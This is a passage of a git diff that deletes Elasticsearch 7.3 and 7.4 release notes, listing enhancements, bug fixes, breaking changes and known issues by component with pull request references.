{es-issue}42820[#42820]) -* Report timing stats as part of the Job stats response {es-pull}42709[#42709] (issue: {es-issue}29857[#29857]) -* Increase maximum forecast interval to 10 years. {es-pull}41082[#41082] (issue: {es-issue}41103[#41103]) -* Upgrade to a newer version of the Apache Portable Runtime library. {ml-pull}495[#495] -* Improve stability of modelling around change points. {ml-pull}496[#496] -* Restrict detection of epoch timestamps in find_file_structure {es-pull}43188[#43188] -* Better detection of binary input in find_file_structure {es-pull}42707[#42707] -* Add a limit on line merging in find_file_structure {es-pull}42501[#42501] (issue: {es-issue}38086[#38086]) -* Improve file structure finder timestamp format determination {es-pull}41948[#41948] (issues: {es-issue}35132[#35132], {es-issue}35137[#35137], {es-issue}38086[#38086]) -* Add earliest and latest timestamps to field stats in find_file_structure response {es-pull}42890[#42890] -* Change dots in CSV column names to underscores in find_file_structure response {es-pull}42839[#42839] (issue: {es-issue}26800[#26800]) - -Mapping:: -* Add dims parameter to dense_vector mapping {es-pull}43444[#43444] -* Added parsing of erroneous field value {es-pull}42321[#42321] (issue: {es-issue}41372[#41372]) - -Network:: -* Do not hang on unsupported HTTP methods {es-pull}43362[#43362] - -Ranking:: -* Fix parameter value for calling data.advanceExact {es-pull}44205[#44205] -* Distance measures for dense and sparse vectors {es-pull}37947[#37947] (issue: {es-issue}31615[#31615]) - -Recovery:: -* Make peer recovery send file info step async {es-pull}43792[#43792] (issue: {es-issue}36195[#36195]) -* Make peer recovery clean files step async {es-pull}43787[#43787] (issue: {es-issue}36195[#36195]) - -Reindex:: -* Reindex max_docs parameter name {es-pull}41894[#41894] (issue: {es-issue}24344[#24344]) - -Search:: -* Split search in two when made against read-only and write indices {es-pull}42510[#42510] (issue: {es-issue}40900[#40900]) -* Rename SearchRequest#crossClusterSearch {es-pull}42363[#42363] -* Allow `fields` to be set to `*` {es-pull}42301[#42301] (issue: {es-issue}39577[#39577]) -* Search - enable low_level_cancellation by default. {es-pull}42291[#42291] (issue: {es-issue}26258[#26258]) -* Cut over ClusterSearchShardsGroup to Writeable {es-pull}41788[#41788] -* Disable max score optimization for queries with unbounded max scores {es-pull}41361[#41361] - -Snapshot/Restore:: -* Recursive Delete on BlobContainer {es-pull}43281[#43281] (issue: {es-issue}42189[#42189]) -* Add SAS Token Authentication Support to Azure Repo Plugin {es-pull}42982[#42982] (issue: {es-issue}42117[#42117]) -* Enable Parallel Deletes in Azure Repository {es-pull}42783[#42783] -* Add Ability to List Child Containers to BlobContainer {es-pull}42653[#42653] (issue: {es-issue}42189[#42189]) -* Add custom metadata to snapshots {es-pull}41281[#41281] (issue: {es-issue}40638[#40638]) - -Store:: -* Shard CLI tool always check shards {es-pull}41480[#41480] (issue: {es-issue}41298[#41298]) - - - -[[bug-7.3.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix incorrect calculation of how many buckets will result from a merge {es-pull}44461[#44461] (issue: {es-issue}43577[#43577]) -* Set document on script when using Bytes.WithScript {es-pull}43390[#43390] -* Bug fix to allow access to top level params in reduce script {es-pull}42096[#42096] (issue: {es-issue}42046[#42046]) - -Allocation:: -* Do not copy initial recovery filter during split {es-pull}44053[#44053] (issue: {es-issue}43955[#43955]) -* Avoid parallel reroutes in DiskThresholdMonitor {es-pull}43381[#43381] (issue: {es-issue}40174[#40174]) -* Reset failed allocation counter before executing routing commands {es-pull}42658[#42658] (issue: {es-issue}39546[#39546]) -* Validate routing commands using updated routing state {es-pull}42066[#42066] (issue: {es-issue}41050[#41050]) - -Analysis:: -* Fix AnalyzeAction response serialization {es-pull}44284[#44284] (issue: {es-issue}44078[#44078]) -* Actually close IndexAnalyzers contents {es-pull}43914[#43914] -* Issue deprecation warnings for preconfigured delimited_payload_filter {es-pull}43684[#43684] (issues: {es-issue}26625[#26625], {es-issue}43568[#43568]) -* Use preconfigured filters correctly in Analyze API {es-pull}43568[#43568] (issue: {es-issue}43002[#43002]) -* Require [articles] setting in elision filter {es-pull}43083[#43083] (issue: {es-issue}43002[#43002]) - -Authentication:: -* Fix broken short-circuit in getUnlicensedRealms {es-pull}44399[#44399] -* Fix Token Service retry mechanism {es-pull}39639[#39639] - -CCR:: -* Skip update if leader and follower settings identical {es-pull}44535[#44535] (issue: {es-issue}44521[#44521]) -* Avoid stack overflow in auto-follow coordinator {es-pull}44421[#44421] (issue: {es-issue}43251[#43251]) -* Avoid NPE when checking for CCR index privileges {es-pull}44397[#44397] (issue: {es-issue}44172[#44172]) -* CCR should not replicate private/internal settings {es-pull}43067[#43067] (issue: {es-issue}41268[#41268]) - -CRUD:: -* Fix NPE when rejecting bulk updates {es-pull}42923[#42923] -* Fix "size" field in the body of AbstractBulkByScrollRequest {es-pull}35742[#35742] (issue: {es-issue}35636[#35636]) - -Cluster Coordination:: -* Local node is discovered when cluster fails {es-pull}43316[#43316] -* Reset state recovery after successful recovery {es-pull}42576[#42576] (issue: {es-issue}39172[#39172]) -* Cluster state from API should always have a master {es-pull}42454[#42454] (issues: {es-issue}38331[#38331], {es-issue}38432[#38432]) -* Omit non-masters in ClusterFormationFailureHelper {es-pull}41344[#41344] - -Data Frame:: -* Treat bulk index failures as an indexing failure {es-pull}44351[#44351] (issue: {es-issue}44101[#44101]) -* Responding with 409 status code when failing _stop {es-pull}44231[#44231] (issue: {es-issue}44103[#44103]) -* Adds index validations to _start data frame transform {es-pull}44191[#44191] (issue: {es-issue}44104[#44104]) -* Data frame task failure do not make a 500 response {es-pull}44058[#44058] (issue: {es-issue}44011[#44011]) -* Audit message missing for autostop {es-pull}43984[#43984] (issue: {es-issue}43977[#43977]) -* Add data frame transform cluster privileges to HLRC {es-pull}43879[#43879] -* Improve pivot nested field validations {es-pull}43548[#43548] -* Adjusting error message {es-pull}43455[#43455] -* Size the GET stats search by number of Ids requested {es-pull}43206[#43206] (issue: {es-issue}43203[#43203]) -* Rewrite start and stop to answer with acknowledged {es-pull}42589[#42589] (issue: {es-issue}42450[#42450]) -* Set data frame transform task state to stopped when stopping {es-pull}42516[#42516] (issue: {es-issue}42441[#42441]) - -Distributed:: -* Fix DefaultShardOperationFailedException subclass xcontent serialization {es-pull}43435[#43435] (issue: {es-issue}43423[#43423]) -* Advance checkpoints only after persisting ops {es-pull}43205[#43205] -* Avoid loading retention leases while writing them {es-pull}42620[#42620] (issue: {es-issue}41430[#41430]) -* Do not use ifSeqNo for update requests on mixed cluster {es-pull}42596[#42596] (issue: {es-issue}42561[#42561]) -* Ensure relocation target still tracked when start handoff {es-pull}42201[#42201] - -Engine:: -* AsyncIOProcessor preserve thread context {es-pull}43729[#43729] -* Account soft deletes for committed segments {es-pull}43126[#43126] (issue: {es-issue}43103[#43103]) -* Prune _id of only docs below local checkpoint of safe commit {es-pull}43051[#43051] (issues: {es-issue}40741[#40741], {es-issue}42979[#42979]) -* Improve translog corruption detection {es-pull}42744[#42744] (issue: {es-issue}42661[#42661]) - -Features/CAT APIs:: -* Fix indices shown in _cat/indices {es-pull}43286[#43286] (issues: {es-issue}33888[#33888], {es-issue}38824[#38824], {es-issue}39933[#39933]) - -Features/ILM:: -* Fix swapped variables in error message {es-pull}44300[#44300] -* Account for node versions during allocation in ILM Shrink {es-pull}43300[#43300] (issue: {es-issue}41879[#41879]) -* Narrow period of Shrink action in which ILM prevents stopping {es-pull}43254[#43254] (issue: {es-issue}43253[#43253]) -* Make ILM force merging best effort {es-pull}43246[#43246] (issues: {es-issue}42824[#42824], {es-issue}43245[#43245]) - -Features/Indices APIs:: -* Check shard limit after applying index templates {es-pull}44619[#44619] (issues: {es-issue}34021[#34021], {es-issue}44567[#44567], {es-issue}44619[#44619]) -* Validate index settings after applying templates {es-pull}44612[#44612] (issues: {es-issue}34021[#34021], {es-issue}44567[#44567]) -* Prevent NullPointerException in TransportRolloverAction {es-pull}43353[#43353] (issue: {es-issue}43296[#43296]) - -Features/Ingest:: -* Read the default pipeline for bulk upsert through an alias {es-pull}41963[#41963] - -Features/Java High Level REST Client:: -* Fix CreateRepository Requeset in HLRC {es-pull}43522[#43522] (issue: {es-issue}43521[#43521]) - -Features/Stats:: -* Return 0 for negative "free" and "total" memory reported by the OS {es-pull}42725[#42725] (issue: {es-issue}42157[#42157]) - -Features/Watcher:: -* NullPointerException when creating a watch with Jira action (#41922) {es-pull}42081[#42081] -* fix unlikely bug that can prevent Watcher from restarting {es-pull}42030[#42030] - -Infra/Core:: -* Add default CLI JVM options {es-pull}44545[#44545] (issues: {es-issue}219[#219], {es-issue}42021[#42021]) -* scheduleAtFixedRate would hang {es-pull}42993[#42993] (issue: {es-issue}38441[#38441]) -* Only ignore IOException when fsyncing on dirs {es-pull}42972[#42972] (issue: {es-issue}42950[#42950]) -* Fix alpha build error message when generate version object from version string {es-pull}40406[#40406] -* Bat scripts to work with JAVA_HOME with parantheses {es-pull}39712[#39712] (issues: {es-issue}30606[#30606], {es-issue}33405[#33405], {es-issue}38578[#38578], {es-issue}38624[#38624]) -* Change licence expiration date pattern {es-pull}39681[#39681] (issue: {es-issue}39136[#39136]) - -Infra/Packaging:: -* Restore setting up temp dir for windows service {es-pull}44541[#44541] -* Fix the bundled jdk flag to be passed through windows startup {es-pull}43502[#43502] - -Infra/Plugins:: -* Do not checksum all bytes at once in plugin install {es-pull}44649[#44649] (issue: {es-issue}44545[#44545]) - -Infra/REST API:: -* Remove deprecated _source_exclude and _source_include from get API spec {es-pull}42188[#42188] - -Infra/Scripting:: -* Allow aggregations using expressions to use _score {es-pull}42652[#42652] - -Machine Learning:: -* Update .ml-config mappings before indexing job, datafeed or df analytics config {es-pull}44216[#44216] (issue: {es-issue}44263[#44263]) -* Wait for .ml-config primary before assigning persistent tasks {es-pull}44170[#44170] (issue: {es-issue}44156[#44156]) -* Fix ML memory tracker lockup when inner step fails {es-pull}44158[#44158] (issue: {es-issue}44156[#44156]) -* Reduce false positives associated with the multi-bucket feature. {ml-pull}491[#491] -* Reduce false positives for sum and count functions on sparse data. {ml-pull}492[#492] -* Fix an edge case causing spurious anomalies (false positives) if the variance -in the count of events changed significantly throughout the period of a seasonal -quantity. (See {ml-pull}489[#489].) - -Mapping:: -* Ensure field caps doesn't error on rank feature fields. {es-pull}44370[#44370] (issue: {es-issue}44330[#44330]) -* Prevent types deprecation warning for indices.exists requests {es-pull}43963[#43963] (issue: {es-issue}43905[#43905]) -* Fix index_prefix sub field name on nested text fields {es-pull}43862[#43862] (issue: {es-issue}43741[#43741]) -* Fix possible NPE in put mapping validators {es-pull}43000[#43000] (issue: {es-issue}37675[#37675]) -* Allow big integers and decimals to be mapped dynamically. {es-pull}42827[#42827] (issue: {es-issue}37846[#37846]) - -Network:: -* Reconnect remote cluster when seeds are changed {es-pull}43379[#43379] (issue: {es-issue}37799[#37799]) -* Don't require TLS for single node clusters {es-pull}42826[#42826] -* Fix Class Load Order in Netty4Plugin {es-pull}42591[#42591] (issue: {es-issue}42532[#42532]) - -Recovery:: -* Ensure to access RecoveryState#fileDetails under lock {es-pull}43839[#43839] -* Make Recovery API support `detailed` params {es-pull}29076[#29076] (issue: {es-issue}28910[#28910]) - -Reindex:: -* Properly serialize remote query in ReindexRequest {es-pull}43457[#43457] (issues: {es-issue}43406[#43406], {es-issue}43456[#43456]) -* Fixing handling of auto slices in bulk scroll requests {es-pull}43050[#43050] -* Remote reindex failure parse fix {es-pull}42928[#42928] -* Fix concurrent search and index delete {es-pull}42621[#42621] (issue: {es-issue}28053[#28053]) -* Propogate version in reindex from remote search {es-pull}42412[#42412] (issue: {es-issue}31908[#31908]) - -SQL:: -* SQL: change the size of the list of concrete indices when resolving multiple indices {es-pull}43878[#43878] (issue: {es-issue}43876[#43876]) -* SQL: handle double quotes escaping {es-pull}43829[#43829] (issue: {es-issue}43810[#43810]) -* SQL: add pretty printing to JSON format {es-pull}43756[#43756] -* SQL: handle SQL not being available in a more graceful way {es-pull}43665[#43665] (issue: {es-issue}41279[#41279]) -* SQL: fix NPE in case of subsequent scrolled requests for a CSV/TSV formatted response {es-pull}43365[#43365] (issue: {es-issue}43327[#43327]) -* Geo: Add coerce support to libs/geo WKT parser {es-pull}43273[#43273] (issue: {es-issue}43173[#43173]) -* SQL: Increase hard limit for sorting on aggregates {es-pull}43220[#43220] (issue: {es-issue}43168[#43168]) -* SQL: Fix wrong results when sorting on aggregate {es-pull}43154[#43154] (issue: {es-issue}42851[#42851]) -* SQL: cover the Integer type when extracting values from _source {es-pull}42859[#42859] (issue: {es-issue}42858[#42858]) - -Search:: -* Don't use index_phrases on graph queries {es-pull}44340[#44340] (issue: {es-issue}43976[#43976]) -* Fix wrong logic in `match_phrase` query with multi-word synonyms {es-pull}43941[#43941] (issue: {es-issue}43308[#43308]) -* Fix UOE on search requests that match a sparse role query {es-pull}43668[#43668] (issue: {es-issue}42857[#42857]) -* Fix propagation of enablePositionIncrements in QueryStringQueryBuilder {es-pull}43578[#43578] (issue: {es-issue}43574[#43574]) -* Fix score mode of the MinimumScoreCollector {es-pull}43527[#43527] (issue: {es-issue}43497[#43497]) -* Fix round up of date range without rounding {es-pull}43303[#43303] (issue: {es-issue}43277[#43277]) -* SearchRequest#allowPartialSearchResults does not handle successful retries {es-pull}43095[#43095] (issue: {es-issue}40743[#40743]) -* Wire query cache into sorting nested-filter computation {es-pull}42906[#42906] (issue: {es-issue}42813[#42813]) -* Fix auto fuzziness in query_string query {es-pull}42897[#42897] -* Fix IntervalBuilder#analyzeText to never return `null` {es-pull}42750[#42750] (issue: {es-issue}42587[#42587]) -* Fix sorting on nested field with unmapped {es-pull}42451[#42451] (issue: {es-issue}33644[#33644]) -* Deduplicate alias and concrete fields in query field expansion {es-pull}42328[#42328] - -Security:: -* Do not swallow I/O exception getting authentication {es-pull}44398[#44398] (issues: {es-issue}44172[#44172], {es-issue}44397[#44397]) -* Use system context for looking up connected nodes {es-pull}43991[#43991] (issue: {es-issue}43974[#43974]) -* SecurityIndexSearcherWrapper doesn't always carry over caches and similarity {es-pull}43436[#43436] -* Detect when security index is closed {es-pull}42191[#42191] - -Snapshot/Restore:: -* Check again on-going snapshots/restores of indices before closing {es-pull}43873[#43873] -* Fix Azure List by Prefix Bug {es-pull}42713[#42713] - -Store:: -* Remove usage of FileSwitchDirectory {es-pull}42937[#42937] (issue: {es-issue}37111[#37111]) -* Fix Infinite Loops in ExceptionsHelper#unwrap {es-pull}42716[#42716] (issue: {es-issue}42340[#42340]) - -Suggesters:: -* Fix suggestions for empty indices {es-pull}42927[#42927] (issue: {es-issue}42473[#42473]) -* Skip explain phase when only suggestions are requested {es-pull}41739[#41739] (issue: {es-issue}31260[#31260]) - - - -[[regression-7.3.0]] -[discrete] -=== Regressions - -Infra/Core:: -* Restore date aggregation performance in UTC case {es-pull}38221[#38221] (issue: {es-issue}37826[#37826]) - - - -[[upgrade-7.3.0]] -[discrete] -=== Upgrades - -Discovery-Plugins:: -* Upgrade AWS SDK to Latest Version {es-pull}42708[#42708] - -Engine:: -* Upgrade to Lucene 8.1.0 {es-pull}42214[#42214] - -Infra/Core:: -* Upgrade HPPC to version 0.8.1 {es-pull}43025[#43025] - -Network:: -* Upgrade to Netty 4.1.36 {es-pull}42543[#42543] (issue: {es-issue}42532[#42532]) - -Snapshot/Restore:: -* Upgrade GCS Repository Dependencies {es-pull}43142[#43142] - - diff --git a/docs/reference/release-notes/7.4.asciidoc b/docs/reference/release-notes/7.4.asciidoc deleted file mode 100644 index 18ccb1b8de6..00000000000 --- a/docs/reference/release-notes/7.4.asciidoc +++ /dev/null @@ -1,654 +0,0 @@ -[[release-notes-7.4.2]] -== {es} version 7.4.2 - -[discrete] -[[bug-7.4.2]] -=== Bug fixes - -Transform:: -* Prevent assignment if any node is older than 7.4 {es-pull}48055[#48055] (issue: {es-issue}48019[#48019]) - -[[release-notes-7.4.1]] -== {es} version 7.4.1 - -Also see <>. - -[[enhancement-7.4.1]] -[discrete] -=== Enhancements - -Engine:: -* Avoid unneeded refresh with concurrent realtime gets {es-pull}47895[#47895] -* sync before trimUnreferencedReaders to improve index preformance {es-pull}47790[#47790] (issues: {es-issue}46201[#46201], {es-issue}46203[#46203]) -* Limit number of retaining translog files for peer recovery {es-pull}47414[#47414] - -Infra/Circuit Breakers:: -* Emit log message when parent circuit breaker trips {es-pull}47000[#47000] - -Machine Learning:: -* Throttle the delete-by-query of expired results {es-pull}47177[#47177] (issues: {es-issue}47003[#47003]) -* The {ml} native processes are now arranged in a `.app` directory structure on - macOS, to allow for notarization on macOS Catalina. {ml-pull}593[#593] - - - -[[bug-7.4.1]] -[discrete] -=== Bug fixes - -Aggregations:: -* DocValueFormat implementation for date range fields {es-pull}47472[#47472] (issues: {es-issue}47323[#47323], {es-issue}47469[#47469]) - -Allocation:: -* Dangling indices strip aliases {es-pull}47581[#47581] - -Analysis:: -* Reset Token position on reuse in `predicate_token_filter` {es-pull}47424[#47424] (issue: {es-issue}47197[#47197]) - -Authentication:: -* Fix AD realm additional metadata {es-pull}47179[#47179] (issue: {es-issue}45848[#45848]) - -Authorization:: -* Use 'should' clause instead of 'filter' when querying native privileges {es-pull}47019[#47019] - -CCR:: -* Do not auto-follow closed indices {es-pull}47721[#47721] (issue: {es-issue}47582[#47582]) -* Relax maxSeqNoOfUpdates assertion in FollowingEngine {es-pull}47188[#47188] (issue: {es-issue}47137[#47137]) - -Cluster Coordination:: -* Omit writing index metadata for non-replicated closed indices on data-only node {es-pull}47285[#47285] (issue: {es-issue}47276[#47276]) - -Features/ILM+SLM:: -* Throw error retrieving non-existent SLM policy {es-pull}47679[#47679] (issue: {es-issue}47664[#47664]) - -Features/Indices APIs:: -* Fix Rollover error when alias has closed indices {es-pull}47148[#47148] (issue: {es-issue}47146[#47146]) - -Features/Java High Level REST Client:: -* Fix ILM HLRC Javadoc->Documentation links {es-pull}48083[#48083] - -Features/Monitoring:: -* [Monitoring] Add new cluster privilege now necessary for the stack monitoring ui {es-pull}47871[#47871] - -Infra/Scripting:: -* Drop stored scripts with the old style-id {es-pull}48078[#48078] (issue: {es-issue}47593[#47593]) - -Machine Learning:: -* Fix detection of syslog-like timestamp in find_file_structure {es-pull}47970[#47970] -* Reinstate ML daily maintenance actions {es-pull}47103[#47103] (issue: {es-issue}47003[#47003]) -* Fix possibility of crash when calculating forecasts that overflow to disk {ml-pull}688[#688] - -Network:: -* Fix es.http.cname_in_publish_address Deprecation Logging {es-pull}47451[#47451] (issue: {es-issue}47436[#47436]) - -SQL:: -* SQL: Fix issue with negative literels and parentheses {es-pull}48113[#48113] (issue: {es-issue}48009[#48009]) -* SQL: add "format" for "full" date range queries {es-pull}48073[#48073] (issue: {es-issue}48033[#48033]) -* SQL: Allow whitespaces in escape patterns {es-pull}47577[#47577] (issue: {es-issue}47401[#47401]) -* SQL: fix multi full-text functions usage with aggregate functions {es-pull}47444[#47444] (issue: {es-issue}47365[#47365]) -* SQL: wrong number of values for columns {es-pull}42122[#42122] - -Search:: -* Fix alias field resolution in match query {es-pull}47369[#47369] - -Snapshot/Restore:: -* Fix Bug in Azure Repo Exception Handling {es-pull}47968[#47968] -* Fix Snapshot Corruption in Edge Case {es-pull}47552[#47552] (issues: {es-issue}46250[#46250], {es-issue}47550[#47550]) - -Store:: -* Allow truncation of clean translog {es-pull}47866[#47866] - -Transform:: -* Fix bwc serialization with 7.3 {es-pull}48021[#48021] - - - -[[release-notes-7.4.0]] -== {es} version 7.4.0 - -Also see <>. - -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likeliness of this -corruption in the case that deletes/updates would be applied by mistake. This -bug is fixed in {es} 7.7 and later versions. More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Activating the <> should be avoided in this version. -Any attempt to log a slow search can throw an AIOOBE due to a bug that -performs concurrent modifications on a shared byte array. -(issue: {es-issue}/48358[#48358]) - -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -https://github.com/elastic/elasticsearch/pull/52555 -This is fixed in {es} 7.7 and later versions. - -[[breaking-7.4.0]] -[discrete] -=== Breaking changes - -Infra/REST API:: -* Update the schema for the REST API specification {es-pull}42346[#42346] (issue: {es-issue}35262[#35262]) - -Machine Learning:: -* Improve progress reporting for data frame analytics {es-pull}45856[#45856] - -Ranking:: -* Forbid empty doc values on vector functions {es-pull}43944[#43944] - -Search:: -* Use float instead of double for query vectors. {es-pull}46004[#46004] - -Snapshot/Restore:: -* Provide an Option to Use Path-Style-Access with S3 Repo {es-pull}41966[#41966] (issue: {es-issue}41816[#41816]) - -Transforms:: -* Combine task_state and indexer_state in _stats {es-pull}45276[#45276] (issue: {es-issue}45201[#45201]) -* Improve response format of transform stats endpoint {es-pull}44350[#44350] (issue: {es-issue}43767[#43767]) - - -[[breaking-java-7.4.0]] -[discrete] -=== Breaking Java changes - -Geo:: -* Geo: Change order of parameter in Geometries to lon, lat {es-pull}45332[#45332] (issue: {es-issue}45048[#45048]) - -Network:: -* Stop Recreating Wrapped Handlers in RestController {es-pull}44964[#44964] - - - -[[deprecation-7.4.0]] -[discrete] -=== Deprecations - -Geo:: -* Geo: add Geometry-based query builders to QueryBuilders {es-pull}45058[#45058] (issues: {es-issue}44715[#44715], {es-issue}45048[#45048]) - -Infra/Core:: -* Bundle AdoptOpenJDK 13 {es-pull}46860[#46860] -* Add deprecation check for pidfile setting {es-pull}45939[#45939] (issues: {es-issue}45938[#45938], {es-issue}45940[#45940]) -* Deprecate the pidfile setting {es-pull}45938[#45938] -* Add node.processors setting in favor of processors {es-pull}45855[#45855] -* Deprecate setting processors to more than available {es-pull}44889[#44889] - -Infra/Settings:: -* Add deprecation check for processors {es-pull}45925[#45925] (issues: {es-issue}45855[#45855], {es-issue}45905[#45905]) - -Machine Learning:: -* Only emit deprecation warning if there was actual change of a datafeed's job_id. {es-pull}44755[#44755] -* Deprecate the ability to update datafeed's job_id. {es-pull}44691[#44691] (issue: {es-issue}44615[#44615]) - - - -[[feature-7.4.0]] -[discrete] -=== New features - -Aggregations:: -* Support Range Fields in Histogram and Date Histogram {es-pull}45395[#45395] -* Add Cumulative Cardinality agg (and Data Science plugin) {es-pull}43661[#43661] (issue: {es-issue}43550[#43550]) - -Analysis:: -* Add support for inlined user dictionary in the Kuromoji plugin {es-pull}45489[#45489] (issue: {es-issue}25343[#25343]) - -Authentication:: -* PKI realm authentication delegation {es-pull}45906[#45906] (issue: {es-issue}34396[#34396]) -* PKI Authentication Delegation in new endpoint {es-pull}43796[#43796] (issue: {es-issue}34396[#34396]) - -Authorization:: -* Add granular privileges for API keys {es-pull}42020[#42020] - -Features/ILM:: -* Add Snapshot Lifecycle Management {es-pull}43934[#43934] (issue: {es-issue}38461[#38461]) - -Features/Watcher:: -* Add max_iterations configuration to watcher action with foreach execution {es-pull}45715[#45715] (issues: {es-issue}41997[#41997], {es-issue}45169[#45169]) - -Geo:: -* [SPATIAL] New ShapeQueryBuilder for querying indexed cartesian geometry {es-pull}45108[#45108] (issue: {es-issue}44980[#44980]) -* [GEO] New ShapeFieldMapper for indexing cartesian geometries {es-pull}44980[#44980] -* Add Circle Processor {es-pull}43851[#43851] (issue: {es-issue}43554[#43554]) -* New `shape` field type for indexing Cartesian Geometries {es-pull}43644[#43644] - -Machine Learning:: -* Allow the user to specify 'query' in Evaluate Data Frame request {es-pull}45775[#45775] (issue: {es-issue}45729[#45729]) -* Call the new _estimate_memory_usage API endpoint on data frame analytics _start {es-pull}45536[#45536] (issues: {es-issue}44699[#44699], {es-issue}45544[#45544]) -* HLRC for memory usage estimation API {es-pull}45531[#45531] (issues: {es-issue}44699[#44699], {es-issue}45188[#45188]) -* Implement ml/data_frame/analytics/_estimate_memory_usage API endpoint {es-pull}45188[#45188] (issue: {es-issue}44699[#44699]) - - - -[[enhancement-7.4.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Add more flexibility to MovingFunction window alignment {es-pull}44360[#44360] (issue: {es-issue}42181[#42181]) -* Optimize Min and Max BKD optimizations {es-pull}44315[#44315] (issue: {es-issue}44290[#44290]) -* Allow pipeline aggs to select specific buckets from multi-bucket aggs {es-pull}44179[#44179] - -Allocation:: -* Defer reroute when starting shards {es-pull}44433[#44433] (issues: {es-issue}42105[#42105], {es-issue}42738[#42738]) -* Allow RerouteService to reroute at lower priority {es-pull}44338[#44338] -* Auto-release of read-only-allow-delete block when disk utilization fa… {es-pull}42559[#42559] (issue: {es-issue}39334[#39334]) - -Analysis:: -* Allow all token/char filters in normalizers {es-pull}43803[#43803] (issue: {es-issue}43758[#43758]) - -Authentication:: -* Allow Transport Actions to indicate authN realm {es-pull}45767[#45767] (issue: {es-issue}45331[#45331]) -* Explicitly fail if a realm only exists in keystore {es-pull}44471[#44471] (issue: {es-issue}44207[#44207]) - -Authorization:: -* Add `manage_own_api_key` cluster privilege {es-pull}45897[#45897] (issue: {es-issue}40031[#40031]) -* Consider `owner` flag when retrieving/invalidating keys with API key service {es-pull}45421[#45421] (issue: {es-issue}40031[#40031]) -* REST API changes for manage-own-api-key privilege {es-pull}44936[#44936] (issue: {es-issue}40031[#40031]) -* Simplify API key service API {es-pull}44935[#44935] (issue: {es-issue}40031[#40031]) - -CCR:: -* Include leases in error message when operations no longer available {es-pull}45681[#45681] - -CRUD:: -* Return seq_no and primary_term for noop update {es-pull}44603[#44603] (issue: {es-issue}42497[#42497]) - -Cluster Coordination:: -* Improve slow logging in MasterService {es-pull}45086[#45086] (issue: {es-issue}45007[#45007]) -* More logging for slow cluster state application {es-pull}45007[#45007] -* Ignore unknown fields if overriding node metadata {es-pull}44689[#44689] -* Allow pending tasks before state recovery {es-pull}44685[#44685] (issue: {es-issue}44652[#44652]) - -Distributed:: -* Do not create engine under IndexShard#mutex {es-pull}45263[#45263] (issue: {es-issue}43699[#43699]) - -Docs Infrastructure:: -* add clarification around TESTSETUP docu and error message {es-pull}43306[#43306] - -Engine:: -* Flush engine after big merge {es-pull}46066[#46066] -* Do sync before closeIntoReader when rolling generation to improve index performance {es-pull}45765[#45765] (issue: {es-issue}45371[#45371]) -* Refactor index engines to manage readers instead of searchers {es-pull}43860[#43860] -* Async IO Processor release before notify {es-pull}43682[#43682] -* Enable indexing optimization using sequence numbers on replicas {es-pull}43616[#43616] (issue: {es-issue}34099[#34099]) - -Features/ILM:: -* Add node setting for disabling SLM {es-pull}46794[#46794] (issue: {es-issue}38461[#38461]) -* Include in-progress snapshot for a policy with get SLM policy API {es-pull}45245[#45245] -* Add option to filter ILM explain response {es-pull}44777[#44777] (issue: {es-issue}44189[#44189]) -* Expose index age in ILM explain output {es-pull}44457[#44457] (issue: {es-issue}38988[#38988]) - -Features/Indices APIs:: -* Add Clone Index API {es-pull}44267[#44267] (issue: {es-issue}44128[#44128]) -* Add description to force-merge tasks {es-pull}41365[#41365] (issue: {es-issue}15975[#15975]) - -Features/Ingest:: -* Fix IngestService to respect original document content type {es-pull}45799[#45799] -* Ingest Attachment: Upgrade tika to v1.22 {es-pull}45575[#45575] -* Retrieve processors instead of checking existence {es-pull}45354[#45354] -* Add ingest processor existence helper method {es-pull}45156[#45156] -* Change the ingest simulate api to not include dropped documents {es-pull}44161[#44161] (issue: {es-issue}36150[#36150]) - -Features/Java High Level REST Client:: -* Add XContentType as parameter to HLRC ART#createServerTestInstance {es-pull}46036[#46036] (issue: {es-issue}45970[#45970]) -* Add CloseIndexResponse to HLRC {es-pull}44349[#44349] (issue: {es-issue}39687[#39687]) -* Add mapper-extras and the RankFeatureQuery in the hlrc {es-pull}43713[#43713] (issue: {es-issue}43634[#43634]) -* removing background state update of Request object by RequestConverte… {es-pull}40156[#40156] (issue: {es-issue}39666[#39666]) -* Add delete aliases API to the high-level REST client {es-pull}32909[#32909] (issue: {es-issue}27205[#27205]) - -Features/Watcher:: -* Add SSL/TLS settings for watcher email {es-pull}45272[#45272] (issue: {es-issue}30307[#30307]) -* Watcher reporting: add email warning if CSV attachment contains values that may be interperted as formulas {es-pull}44460[#44460] -* Watcher add stopped listener {es-pull}43939[#43939] (issue: {es-issue}42409[#42409]) -* Improve CryptoService error message on missing secure file {es-pull}43623[#43623] (issue: {es-issue}43619[#43619]) - -Geo:: -* Support WKT point conversion to geo_point type {es-pull}44107[#44107] (issue: {es-issue}41821[#41821]) - -Infra/Circuit Breakers:: -* Fix G1 GC default IHOP {es-pull}46169[#46169] - -Infra/Core:: -* Add OCI annotations and adjust existing annotations {es-pull}45167[#45167] (issues: {es-issue}45162[#45162], {es-issue}45166[#45166]) -* Use the full hash in build info {es-pull}45163[#45163] (issue: {es-issue}45162[#45162]) - -Infra/Packaging:: -* Remove redundant Java check from Sys V init {es-pull}45793[#45793] (issue: {es-issue}45593[#45593]) -* Notify systemd when Elasticsearch is ready {es-pull}44673[#44673] - -Infra/Plugins:: -* Make plugin verification FIPS 140 compliant {es-pull}44224[#44224] (issue: {es-issue}41263[#41263]) - -Infra/Scripting:: -* Whitelist randomUUID in Painless {es-pull}45148[#45148] (issue: {es-issue}39080[#39080]) -* Add missing ZonedDateTime methods for joda compat layer {es-pull}44829[#44829] (issue: {es-issue}44411[#44411]) -* Remove stale permissions from untrusted policy {es-pull}44783[#44783] - -Infra/Settings:: -* Add more meaningful keystore version mismatch errors {es-pull}46291[#46291] (issue: {es-issue}44624[#44624]) -* Lift the restrictions that uppercase is not allowed in Setting Name. {es-pull}45222[#45222] (issue: {es-issue}43835[#43835]) -* Normalize environment paths {es-pull}45179[#45179] (issue: {es-issue}45176[#45176]) - -Machine Learning:: -* Support boolean fields for data frame analytics {es-pull}46037[#46037] -* Add description to data frame analytics {es-pull}45774[#45774] -* Add regression analysis to data frame analytics 